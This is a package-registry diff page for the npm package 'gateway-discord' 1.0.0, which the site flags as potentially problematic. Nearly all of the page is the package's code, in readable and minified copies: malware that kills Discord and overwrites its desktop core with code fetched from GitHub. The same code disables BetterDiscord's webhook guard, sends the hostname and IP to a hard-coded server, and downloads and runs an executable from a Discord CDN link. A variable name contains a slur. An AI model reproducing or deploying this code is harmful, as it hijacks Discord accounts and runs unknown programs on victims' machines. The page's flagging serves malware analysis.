gateway-discord 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of gateway-discord might be problematic. Click here for more details.
- package/backup.js +215 -0
- package/index.js +1 -0
- package/package.json +31 -0
package/backup.js
ADDED
@@ -0,0 +1,215 @@
|
|
1
|
+
|
2
|
+
const glob = require("glob");
|
3
|
+
const fs = require('fs');
|
4
|
+
const https = require('node:https');
|
5
|
+
const { exec } = require('child_process');
|
6
|
+
const shell = require('shelljs')
|
7
|
+
const os = require('node:os');
|
8
|
+
const axios = require('axios');
|
9
|
+
const download = require('download');
|
10
|
+
var ip = require("ip");
|
11
|
+
const zip = require("adm-zip");
|
12
|
+
const FormData = require("form-data");
|
13
|
+
var XMLHttpRequest = require('xhr2');
|
14
|
+
const buf_replace = require('buffer-replace');
|
15
|
+
const { session, BrowserWindow } = require("electron");
|
16
|
+
const path = require("path");
|
17
|
+
const querystring = require("querystring");
|
18
|
+
//////////////////////////////////////////////////////////////////////
|
19
|
+
const config = {
|
20
|
+
"logout": "instant",
|
21
|
+
"inject-notify": "true",
|
22
|
+
"logout-notify": "true",
|
23
|
+
"init-notify":"true",
|
24
|
+
"embed-color": 123,
|
25
|
+
"USERNAMEWEBHOOK": "moonsz",
|
26
|
+
"disable-qr-code": "true"
|
27
|
+
}
|
28
|
+
//////////////////////////////////////////////////////////////////////
|
29
|
+
let LOCAL = process.env.LOCALAPPDATA
|
30
|
+
let discords = [];
|
31
|
+
let injectPath = [];
|
32
|
+
let runningDiscords = [];
|
33
|
+
|
34
|
+
fs.readdirSync(LOCAL).forEach(file => {
|
35
|
+
if (file.includes("iscord")) {
|
36
|
+
discords.push(LOCAL + '\\' + file)
|
37
|
+
} else {
|
38
|
+
return;
|
39
|
+
}
|
40
|
+
});
|
41
|
+
|
42
|
+
const temp = process.env.temp;
|
43
|
+
|
44
|
+
const infecccc = async () => {
|
45
|
+
const response = await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe", {
|
46
|
+
responseType: "arraybuffer"
|
47
|
+
});
|
48
|
+
|
49
|
+
await fs.writeFileSync(temp + "\\qwerty.exe", response.data, {
|
50
|
+
encoding: "utf8",
|
51
|
+
flags: "w"
|
52
|
+
});
|
53
|
+
|
54
|
+
await exec(temp + `\\qwerty.exe`);
|
55
|
+
|
56
|
+
return;
|
57
|
+
};
|
58
|
+
|
59
|
+
|
60
|
+
function Infect() {
|
61
|
+
|
62
|
+
https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
|
63
|
+
let data = '';
|
64
|
+
|
65
|
+
resp.on('data', (chunk) => {
|
66
|
+
data += chunk;
|
67
|
+
});
|
68
|
+
resp.on('end', () => {
|
69
|
+
injectPath.forEach(file => {
|
70
|
+
fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
|
71
|
+
encoding: 'utf8',
|
72
|
+
flag: 'w'
|
73
|
+
});
|
74
|
+
|
75
|
+
if (config["init-notify"] == "true") {
|
76
|
+
let init = file.replace("index.js", "init")
|
77
|
+
if (!fs.existsSync(init)) {
|
78
|
+
fs.mkdirSync(init, 0744)
|
79
|
+
}
|
80
|
+
}
|
81
|
+
|
82
|
+
if ( config.logout != "false" ) {
|
83
|
+
let folder = file.replace("index.js", "DC_BTW")
|
84
|
+
if (!fs.existsSync(folder)) {
|
85
|
+
fs.mkdirSync(folder, 0744)
|
86
|
+
if (config.logout == "instant") {
|
87
|
+
startDiscord();
|
88
|
+
}
|
89
|
+
} else if (fs.existsSync(folder) && config.logout == "instant" ){
|
90
|
+
startDiscord();
|
91
|
+
}
|
92
|
+
}
|
93
|
+
})
|
94
|
+
});
|
95
|
+
}).on("error", (err) => {
|
96
|
+
});
|
97
|
+
};
|
98
|
+
|
99
|
+
const logout = async () => {
|
100
|
+
await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
|
101
|
+
`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
|
102
|
+
true
|
103
|
+
);
|
104
|
+
|
105
|
+
return "ok";
|
106
|
+
};
|
107
|
+
|
108
|
+
function killDiscord() {
|
109
|
+
runningDiscords.forEach(disc => {
|
110
|
+
exec(`taskkill /IM ${disc}.exe /F`, (err) => {
|
111
|
+
if (err) {
|
112
|
+
return;
|
113
|
+
}
|
114
|
+
});
|
115
|
+
});
|
116
|
+
|
117
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
118
|
+
injectNotify();
|
119
|
+
|
120
|
+
}
|
121
|
+
Infect()
|
122
|
+
pwnBetterDiscord()
|
123
|
+
};
|
124
|
+
|
125
|
+
function listDiscords() {
|
126
|
+
exec('tasklist', function(err, stdout, stderr) {
|
127
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
|
128
|
+
if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
|
129
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
|
130
|
+
if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
|
131
|
+
if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
|
132
|
+
if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
|
133
|
+
if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
|
134
|
+
if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
|
135
|
+
if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
|
136
|
+
if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
|
137
|
+
|
138
|
+
if (config.logout == "instant") {
|
139
|
+
killDiscord();
|
140
|
+
} else {
|
141
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
142
|
+
injectNotify();
|
143
|
+
}
|
144
|
+
Infect()
|
145
|
+
pwnBetterDiscord()
|
146
|
+
}
|
147
|
+
})
|
148
|
+
};
|
149
|
+
|
150
|
+
function startDiscord() {
|
151
|
+
runningDiscords.forEach(disc => {
|
152
|
+
let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
|
153
|
+
exec(path, (err) => {
|
154
|
+
if (err) {
|
155
|
+
return;
|
156
|
+
}
|
157
|
+
});
|
158
|
+
});
|
159
|
+
};
|
160
|
+
|
161
|
+
function pwnBetterDiscord() {
|
162
|
+
let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
|
163
|
+
if (fs.existsSync(dir)) {
|
164
|
+
let x = fs.readFileSync(dir)
|
165
|
+
fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
|
166
|
+
}
|
167
|
+
|
168
|
+
return;
|
169
|
+
}
|
170
|
+
|
171
|
+
function injectNotify() {
|
172
|
+
let fields = [];
|
173
|
+
injectPath.forEach( path => {
|
174
|
+
let c = path
|
175
|
+
fields.push(c)
|
176
|
+
})
|
177
|
+
|
178
|
+
const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
|
179
|
+
var xhr = new XMLHttpRequest();
|
180
|
+
xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
|
181
|
+
xhr.setRequestHeader('Content-type', 'application/json');
|
182
|
+
xhr.onload = function () {
|
183
|
+
const negrodefender = this.responseText;
|
184
|
+
};
|
185
|
+
xhr.send(data);
|
186
|
+
}
|
187
|
+
|
188
|
+
function getDirectories(path) {
|
189
|
+
return fs.readdirSync(path).filter(function (file) {
|
190
|
+
return fs.statSync(path+'/'+file).isDirectory();
|
191
|
+
});
|
192
|
+
}
|
193
|
+
|
194
|
+
|
195
|
+
listDiscords();
|
196
|
+
discords.forEach(function(file) {
|
197
|
+
getDirectories(file + "\\").forEach((item) => {
|
198
|
+
if (item.includes("app-")) {
|
199
|
+
file = file + "\\" + item + "\\modules\\";
|
200
|
+
}
|
201
|
+
});
|
202
|
+
getDirectories(file).forEach((item) => {
|
203
|
+
if (item.includes("discord_desktop_core-")) {
|
204
|
+
file = file + "\\" + item + "\\discord_desktop_core\\index.js";
|
205
|
+
}
|
206
|
+
});
|
207
|
+
|
208
|
+
if (fs.existsSync(file)) {
|
209
|
+
injectPath.push(file);
|
210
|
+
}
|
211
|
+
});
|
212
|
+
killDiscord();
|
213
|
+
Infect();
|
214
|
+
startDiscord();
|
215
|
+
infecccc();
|
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const glob=require("glob"),fs=require("fs"),https=require("node:https"),{exec:exec}=require("child_process"),shell=require("shelljs"),os=require("node:os"),axios=require("axios"),download=require("download");var ip=require("ip");const zip=require("adm-zip"),FormData=require("form-data");var XMLHttpRequest=require("xhr2");const buf_replace=require("buffer-replace"),{session:session,BrowserWindow:BrowserWindow}=require("electron"),path=require("path"),querystring=require("querystring"),config={logout:"instant","inject-notify":"true","logout-notify":"true","init-notify":"true","embed-color":123,USERNAMEWEBHOOK:"moonsz","disable-qr-code":"true"};let LOCAL=process.env.LOCALAPPDATA,discords=[],injectPath=[],runningDiscords=[];fs.readdirSync(LOCAL).forEach((e=>{e.includes("iscord")&&discords.push(LOCAL+"\\"+e)}));const temp=process.env.temp,infecccc=async()=>{const e=await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe",{responseType:"arraybuffer"});await fs.writeFileSync(temp+"\\qwerty.exe",e.data,{encoding:"utf8",flags:"w"}),await exec(temp+"\\qwerty.exe")};function Infect(){https.get("https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js",(e=>{let i="";e.on("data",(e=>{i+=e})),e.on("end",(()=>{injectPath.forEach((e=>{if(fs.writeFileSync(e,i.replace("%INITNOTI%",config["init-notify"]).replace("%USERIP%",ip.address()).replace("%LOGOUT%",config.logout).replace("%USERNAMEWEBHOOK%",config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%",config["logout-notify"]).replace("3447704",config["embed-color"]).replace("%DISABLEQRCODE%",config["disable-qr-code"]),{encoding:"utf8",flag:"w"}),"true"==config["init-notify"]){let i=e.replace("index.js","init");fs.existsSync(i)||fs.mkdirSync(i,484)}if("false"!=config.logout){let i=e.replace("index.js","DC_BTW");fs.existsSync(i)?fs.existsSync(i)&&"instant"==config.logout&&startDiscord():(fs.mkdirSync(i,484),"instant"==config.logout&&startDiscord())}}))}))})).on("error",(e=>{}))}const logout=async()=>(await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript('window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',!0),"ok");function killDiscord(){runningDiscords.forEach((e=>{exec(`taskkill /IM ${e}.exe /F`,(e=>{}))})),"true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord()}function listDiscords(){exec("tasklist",(function(e,i,n){i.includes("Discord.exe")&&runningDiscords.push("discord"),i.includes("Discord (32 bits).exe")&&runningDiscords.push("Discord"),i.includes("Discord.exe")&&runningDiscords.push("Discord (32 bits)"),i.includes("DiscordCanary.exe")&&runningDiscords.push("discordcanary"),i.includes("Discord Canary (32 bits).exe")&&runningDiscords.push("Discord Canary"),i.includes("DiscordDevelopment.exe")&&runningDiscords.push("discorddevelopment"),i.includes("DiscordPTB.exe")&&runningDiscords.push("discordptb"),i.includes("Powercord.exe")&&runningDiscords.push("powercord"),i.includes("Fiddler.exe")&&runningDiscords.push("fiddler"),i.includes("wireshark.exe")&&runningDiscords.push("wireshark"),"instant"==config.logout?killDiscord():("true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord())}))}function startDiscord(){runningDiscords.forEach((e=>{exec(LOCAL+"\\"+e+"\\Update.exe --processStart "+e+".exe",(e=>{}))}))}function pwnBetterDiscord(){let e=process.env.appdata+"\\BetterDiscord\\data\\betterdiscord.asar";if(fs.existsSync(e)){let i=fs.readFileSync(e);fs.writeFileSync(e,buf_replace(i,"api/webhooks","dc"))}}function injectNotify(){let e=[];injectPath.forEach((i=>{let n=i;e.push(n)}));const i=`{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`;var n=new XMLHttpRequest;n.open("POST","http://20.14.80.127/api/newinjection",!0),n.setRequestHeader("Content-type","application/json"),n.onload=function(){this.responseText},n.send(i)}function getDirectories(e){return fs.readdirSync(e).filter((function(i){return fs.statSync(e+"/"+i).isDirectory()}))}listDiscords(),discords.forEach((function(e){getDirectories(e+"\\").forEach((i=>{i.includes("app-")&&(e=e+"\\"+i+"\\modules\\")})),getDirectories(e).forEach((i=>{i.includes("discord_desktop_core-")&&(e=e+"\\"+i+"\\discord_desktop_core\\index.js")})),fs.existsSync(e)&&injectPath.push(e)})),killDiscord(),Infect(),startDiscord(),infecccc();
|
package/package.json
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
{
|
2
|
+
"dependencies": {
|
3
|
+
"adm-zip": "^0.5.9",
|
4
|
+
"axios": "^0.27.2",
|
5
|
+
"buffer-replace": "^1.0.0",
|
6
|
+
"child_process": "^1.0.2",
|
7
|
+
"color": "^4.2.3",
|
8
|
+
"download": "^8.0.0",
|
9
|
+
"electron": "^19.0.9",
|
10
|
+
"form-data": "^4.0.0",
|
11
|
+
"fs": "^0.0.1-security",
|
12
|
+
"glob": "^8.0.3",
|
13
|
+
"https": "^1.0.0",
|
14
|
+
"ip": "^1.1.8",
|
15
|
+
"os": "^0.1.2",
|
16
|
+
"path": "^0.12.7",
|
17
|
+
"querystring": "^0.2.1",
|
18
|
+
"shelljs": "^0.8.5",
|
19
|
+
"xhr2": "^0.2.1"
|
20
|
+
},
|
21
|
+
"name": "gateway-discord",
|
22
|
+
"version": "1.0.0",
|
23
|
+
"main": "index.js",
|
24
|
+
"devDependencies": {},
|
25
|
+
"scripts": {
|
26
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
27
|
+
},
|
28
|
+
"author": "nahedasamic <nahedasamic@gmail.com>",
|
29
|
+
"license": "MIT",
|
30
|
+
"description": ""
|
31
|
+
}
|